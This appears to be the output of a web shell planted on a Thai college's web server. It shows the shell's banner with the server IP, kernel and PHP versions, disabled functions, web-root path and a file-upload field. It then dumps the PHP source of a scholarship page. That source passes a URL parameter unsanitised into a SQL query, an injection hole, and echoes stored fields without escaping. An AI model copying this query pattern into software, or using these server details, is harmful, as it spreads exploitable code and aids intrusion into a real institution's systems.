Server IP : 202.29.229.35 / Your IP : 3.145.125.13 Web Server : Apache System : Linux aapanel2 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 User : www ( 1001) PHP Version : 5.5.38 Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /www/wwwroot/www.ivecr2.ac.th/system_admin/ |
Upload File : |
<table width="700" border="0" align="center" cellpadding="0" cellspacing="5"> <tr> <td align="center" valign="top"><h2 class="home_title_event">.:: ทุนการศึกษา ::.</h2></td> </tr> <tr> <td align="right" valign="top"><a href="?i=Scholarship"><img src="images/buttonmenu/backfont.gif" width="150" height="50" border="0" /></a></td> </tr> <tr> <td align="left" valign="top"> <center> <?php include("connect/connect.php"); //include("connect/function.php"); $scID=$_GET['scID']; $sqlSC="select * from tbl_scholarship where sc_ID='$scID' "; $resultSC=mysql_query($sqlSC,$connect1); $numSC=mysql_num_rows($resultSC); $rsSC=mysql_fetch_array($resultSC); $dateSC=displaydate($rsSC['sc_Date']); $dp_ID=$rsSC['dp_ID']; $sqlworkregister="select * from tbladmin where adID='$dp_ID' "; $resqlworkregister=mysql_query($sqlworkregister,$connect1); $rsworkregister=mysql_fetch_array($resqlworkregister); $worknameuser=$rsworkregister['adFname']; $workname=$rsworkregister['addepartment']; echo $rsSC['sc_Title']."<p>"; ?> </center> <br /> <hr width="600" /> <?php echo $rsSC['sc_Detail']; if($rsSC['sc_file'] !=""){ ?><a href="file_scholarship/<?php echo $rsSC['sc_file'];?>" target="_blank"> <font color="#FF0000" size="+1"> คลิกอ่านรายละเอียดเพิ่มเติม...</font></a><?php } ?><p> <font color="#0099FF" size="-2"><i>ข้อมูลโดย : <?php echo $workname. " เมื่อ :".$dateSC;?></i></font> </td> </tr> </table>